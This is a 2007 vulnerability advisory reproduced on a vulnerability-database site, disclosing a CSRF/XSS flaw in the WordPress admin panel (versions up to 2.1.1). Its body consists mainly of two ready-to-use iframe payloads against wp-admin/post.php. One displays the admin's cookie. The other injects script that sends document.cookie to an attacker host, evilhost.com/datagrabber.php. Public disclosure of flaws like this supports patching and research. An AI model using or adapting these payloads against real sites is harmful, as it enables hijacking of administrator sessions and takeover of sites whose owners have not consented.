Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16192
HistoryFeb 27, 2007 - 12:00 a.m.

WordPress AdminPanel CSRF/XSS - 0day

2007-02-2700:00:00
vulners.com
21
JSON

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

±--------------------------------------------------------------------------+
| SaMuschie Research Labs proudly presents . . . |
±--------------------------------------------------------------------------+
| Application: wordpress Version: <= 2.1.1 |
| Vuln./Exploit Type: AdminPanel CSRF/XSS Status: 0day |
±--------------------------------------------------------------------------+
| Discovered by: Samenspender Released: 20070226 |
| SaMuschie Release Number: 1 |
±--------------------------------------------------------------------------+

Exploit:

Cookie in an Alert Box:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&amp;post=&#37;27&#37;3E&#37;3Cscript&#37;3Ealert&#40;document.cookie&#41;&#37;3C/script&#37;3E&#37;3Clol=&#37;27&#39;&gt;&lt;/iframe&gt;

Cookie send to an Evil Host:
<iframe width=600 height=400
src='http://example.com/wp-admin/post.php?action=delete&amp;post=&#37;27&#37;3E&#37;3Cscript&#37;3Eimage=document.createElement&#40;&#37;27img&#37;27&#41;;image.src=&#37;27http://evilhost.com/datagrabber.php?cookie=&#37;27&#37;2bdocument.cookie;&#37;3C/script&#37;3E&#37;3Clol=&#37;27&#39;&gt;&lt;/iframe&gt;

±--------------------------------------------------------------------------+
| Lameness Disclaimer |
±--------------------------------------------------------------------------+
| SaMuschie Research Labs was found to publish vulnerabilities within well |
| known software products, which are easy to discover and exploit. |
| |
| SaMuschie researchers just spend a minimum of time and knowledge for each |
| vulnerability. Hence readers of this advisory are requested not to ask |
| any questions to the researchers… they don't know the answer ;) |
±--------------------------------------------------------------------------+
±--------------------------------------------------------------------------+
| EOF |
±--------------------------------------------------------------------------+
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFF4xadMFgfGpQK8VERAkO5AJ9V8uosk2DATRTARHDhPxNe+RHirgCeKQ0h
aFgDpHnxPP+/4Ot5bLBZy9Q=
=/gS4
-----END PGP SIGNATURE-----

Der fruhe Vogel fangt den Wurm. Hier gelangen Sie zum neuen Yahoo! Mail: http://mail.yahoo.de

JSON